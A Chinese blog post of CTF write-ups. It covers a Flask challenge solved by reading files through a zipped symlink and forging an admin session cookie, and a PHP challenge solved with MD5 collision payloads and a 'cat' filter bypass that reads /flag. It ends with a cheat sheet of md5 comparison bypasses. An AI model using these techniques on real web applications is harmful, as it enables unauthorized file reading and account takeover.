文件任意读取和强碰撞

最新推荐文章于 2024-03-25 19:30:47 发布
最新推荐文章于 2024-03-25 19:30:47 发布
阅读量2k 收藏 5
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/120015850
版权

文章目录

一、babypython[国赛总决赛复现]

考点:硬链接读取任意文件、伪造session

这个题当时打开是一个文件上传 然后上传一个文件 显示需要上传zipfile,当时用bp拦截 改zip 上传成功后 没有回显文件的路径
然后就卡住了 后来发现这个题考点是 硬链接读取任意文件 伪造session

ln -si /app/y0u_found_it.ini link
zip --symlinks 1.zip link
通过上述的两条命令可以构造硬链接,从而读取任意文件。不过过滤了environ,但是其他内容都没有过滤,直接一条龙访问过去了。
在这里插入图片描述
图中uuid.getnode()主要是获取mac地址,读取/sys/class/net/eth0/address文件内容,构造一个脚本即可(需要注意的是这里是Python3的环境,所以要用Python3跑)

import uuid
import random
random.seed(int("0242ac1085a9",16))
print(str(random.random()*100))

#Python3  74.74211296004316
#Python2  74.74211296

最后构造一个flask网站用来获取Cookie值

from flask import *
app = Flask(__name__)
app.config['SECRET_KEY'] = "74.74211296004316"

@app.route("/",methods=['GET','POST'])
def login():
    session['username'] = u'admin'
    return 'atao'
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000)

在这里插入图片描述

二、BUUCTF-[安洵杯 2019]easy_web

在这里插入图片描述
卷死我吧 大吐
在这里插入图片描述

两次base 然后十六进制 得到 5.jpg
然后 将 index.php 先十六进制 再base两次 得到
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
然后上传 得到源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

关键代码:

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }

有一个MD5强绕过,解法如下 这是强碰撞
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

再看到源代码

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";

虽然过滤了ls但是我们可以用dir
在这里插入图片描述
发现没有flag,在访问根目录
注意他这里好像过滤了空格,得用%20代替空格
发现根目录下有flag,但是过滤了cat
绕过方法:
ca\t 后面的\t会成为 TAB 而绕过,看来以后特殊符号得熟悉
接着就简单了
查询bin下的flag文件
ca\t%20/flag
在这里插入图片描述

总结

这里总结一下 强比较 弱比较 强碰撞的处理方法
弱比较

if( P O S T [ ′ a ′ ] ! = _POST['a']!= POST[a]!=_POST[‘b’]&& md5( P O S T [ ′ a ′ ] ) = = m d 5 ( _POST['a'])==md5( POST[a])==md5(_POST[‘b’])){
die(“success!”);
}

在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过
payload:

a=QNKCDZO&b=s878926199a

常用md5加密后为0的字符串:
240610708,aabg7XSs,aabC9RqS
s878926199a

0e215962017的md5加密等于0e291242476940776845150308577824 可以用于绕过md5加密等于本身比较的弱等于。因为php比较的时候会转化为相同类型字符串再比较。则都为0.

强比较
if( P O S T [ ′ a ′ ] ! = = _POST['a']!== POST[a]!==_POST[‘b’]&& md5( P O S T [ ′ a ′ ] ) = = = m d 5 ( _POST['a'])===md5( POST[a])===md5(_POST[‘b’])){
die(“success!”);
}

像这样的强比较,上面的方法就失效了,但是如果传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较里面null=null为true绕过
payload:

a[]=1&b[]=2

强碰撞
if((string) P O S T [ ′ a ′ ] ! = = ( s t r i n g ) _POST['a']!==(string) POST[a]!==(string)_POST[‘b’] && md5( P O S T [ ′ a ′ ] ) = = = m d 5 ( _POST['a'])===md5( POST[a])===md5(_POST[‘b’])){
die(“success!”);
}

到强碰撞这里,它用string强行转换成字符串,经过尝试发现只要是数组进行string的话,输出的结果一定是Array。是其他的话就会直接输出为字符串。从而限制了数组绕过这方法,只能输入字符串
先上payload:

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

这一大长串的编码,他们的md5值是相等的,原理是将hex字符串转化为ascii字符串,并写入到bin文件
考虑到要将一些不可见字符传到服务器,这里使用url编码

param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

H0ne
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
BUUCTF 加固题 babypython WriteUp
柠檬i的博客
12-06 1152
主要用了secrets模块加固,提供较安全的随机数,防止伪造session
2021 DASCTF八月挑战赛
weixin_43610673的博客
08-30 2828
babypython[国赛总决赛复现] 看着像是[HCTF 2018]Hide and seek 这题改的,和[CISCN2019 华东南赛区]Web4的加密SECRET_KEY的方式也一样 进去提示要变admin,想到session伪造,直接jwt.io伪造不了,需要SECRET_KEY。上传文件只能为zip ,软链接zip 读取文件。 ln -s /etc/passwd passwd zip --symlinks passwd.zip passwd 读取/proc/self/environ提示bad
[柏鹭杯 2021]baby_python
liaochonxiang的博客
03-19 355
可见核心代码在baby_core.pyc中,也就是在baby.exe_extracted\PYZ-00.pyz_extracted\baby_python中。pyinstxtractor解包,发现需要python3.7本版,不然解出来了,会发现PYZ-00.pyz_extracted文件夹中什么也没有。会有许多报错,也是正常的,因为PYZ-00.pyz_extracted目录下的文件被加密了。baby_python\baby_core.pyc.encrypted也是被加密的。接下来写个文件解密脚本。
2023年第三届陕西省大学生网络安全技能大赛之babypython
qq_41853048的博客
06-07 251
第一题做的挺快的,直接动态调试转伪代码就出了,然后接下来就一直坐牢了,babypython本来听说gpt4可以直接输入上万行分析,结果感觉和gpt3的差距也不大,字节码太多了,无从下手😥。
2021-DASCTF八月挑战赛
Yasso的博客
09-01 1538
babypython[国赛总决赛复现] 是个上传界面,经测试只能上传zip文件 看到页面提示,猜测只有admin才能得到flag,需要伪造session,伪造session要用到一个工具-flask-unsign 所以这道题关键是需要找到key. 可以上传zip文件,同时后台自动解压的情况下,从而实现任意文件读取。 软连接导致任意文件读取 我们可以压缩一个软链接,类似于windows下的快捷方式,然后网站后台会解压读取该软链接指向的服务器上的文件,就能达到读取任意文件的效果。 ln -s /etc/pas
web新手题目大全
NYG694的博客
07-18 183
然后再对test进行压缩 zip -r test1.zip test。shell文件内容: <?3指定参数访问(本地127.0.0.1 X-forwarded-for)接下来就是在var/www/html目录下上传一个shell文件就可以了。这时解压文件后是软连接就会实现从tmp指向var/www/html。6.vim读取,利用vim特性读取wep文件。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。4 cookie暗示。
python3读取csv文件任意行列代码实例
09-18
本文将详细介绍如何使用Python3读取CSV文件任意行列,并提供相关代码实例。 首先,读取CSV文件的基本步骤是使用`open()`函数打开文件,然后创建一个`csv.reader`对象。下面是一个读取CSV文件每一行的示例: ```...
java使用randomaccessfile在文件任意位置写入数据
09-04
随机访问文件(RandomAccessFile)是Java提供的一个类,它允许程序随机访问文件中的任意位置,进行读写操作。使用RandomAccessFile可以在文件任意位置插入数据,这对于那些需要在文件中间添加内容而不干扰其他数据...
Binary Viewer二进制文件读取软件
07-10
**二进制文件读取与Binary Viewer** 在计算机科学领域,二进制文件是指由机器可以直接理解和执行的数据格式,它们不包含任何人类可读的文本信息。这些文件通常包括音频、视频、图像、程序和系统文件等。由于二进制...
baby-python-steps:idk男人我正在尝试python
03-09
婴儿Python步骤 这是我第一次尝试python idk男人他妈的python wtf是这个狗屎
C#读取BIN文件内容
08-23
在处理特定类型的二进制文件,如BIN文件时,C#提供了丰富的库和方法来读取和操作这些文件。BIN文件通常包含原始二进制数据,可能来自固件更新、程序执行代码或者数据存储。下面我们将详细讨论如何在C#中读取BIN文件...
文件读写内存映射.rar
05-18
本主题聚焦于Qt框架下如何利用内存映射进行大文件的读写操作。Qt是一个跨平台的C++库,提供了丰富的功能,包括图形用户界面、网络编程、数据库访问等,同时也支持内存映射技术。 内存映射允许将大文件的部分或全部...
文件任意读取
02-03
本人自己重新封装BufferedReader类的文件读取工具类,节省了每次使用文件读取类是的处理和转换工作,并且提供了丰富的方法,可以读取任意行数内容,并且可以带有行号,绝对好!
Qt多线程读写大型文本文件项目
04-29
2.读取文本文件,显示到桌面控件中; 3.读取文件使用多线程处理,不影响显示界面正常操作; 4.读取过来的文件如有修改,需要保存修改部分; 5.读、写文件需要显示处理进度; 6.增加一个列表,用于展示文本文件的...
baby python
2301_79935671的博客
03-25 575
原题wp参考链接:https://www.cnblogs.com/karsa/p/13529769.html。伪造,直接jwt.io伪造不了,需要SECRET_KEY。ssh连上查文件/app/y0u_found_it/y0u_found_it_main.py。解题思路是软链接zip读取文件,然后伪造admin的session读取flag。所以用软连接读取/sys/class/net/eth0/address。首先下载secrets模块,secrets模块可以提供比较的随机数。导入secrets模块。
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2040
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
CTF逆向-[NPUCTF2020]Baby Obfuscation-逆向思维编写脚本以及函数含义的逻辑理解
serfend's blog
04-27 753
CTF逆向-[NPUCTF2020]Baby Obfuscation-逆向思维编写脚本以及函数含义的逻辑理解 来源:https://buuoj.cn/ 内容: 附件: https://pan.baidu.com/s/1jjjo11izhnEUQaLx00993w?pwd=pxdj 提取码:pxdj 答案:NPUCTF{0bfu5er} 总体思路 根据执行逻辑分析每个函数的含义 逻辑思维简化题目的代码,将其理解成较为简短的句子 逆向思维去编写脚本 详细步骤 查看文件内容 打开以后发现主函数里
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 326
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
Jenkins 任意文件读取漏洞
最新发布
07-12
Jenkins是一个流行的开源持续集成工具,它允许自动化软件构建、测试和部署过程。然而,在某些版本中存在一个已知的安全漏洞,通常称为“Jenkins任意文件读取漏洞”或CVE-2021-22073。这个漏洞发生在jenkins主控台插件管理功能中,攻击者如果能够利用该漏洞,可以构造恶意请求,导致Jenkins服务器从远程或本地文件系统读取未经授权的文件。 漏洞的原理是由于插件管理界面的一个设计缺陷,使得恶意用户可以构造URL包含通配符或其他路径解析符号,进而获取到敏感文件。这种漏洞未经授权的访问权限可能会泄露敏感信息,如配置文件、源代码甚至用户的私有数据。 为了修复这个问题,Jenkins社区会发布安全更新,并建议受影响的用户尽快升级到最新版本,禁用不受信任的插件,或者配置适当的文件系统权限策略来限制对文件的访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值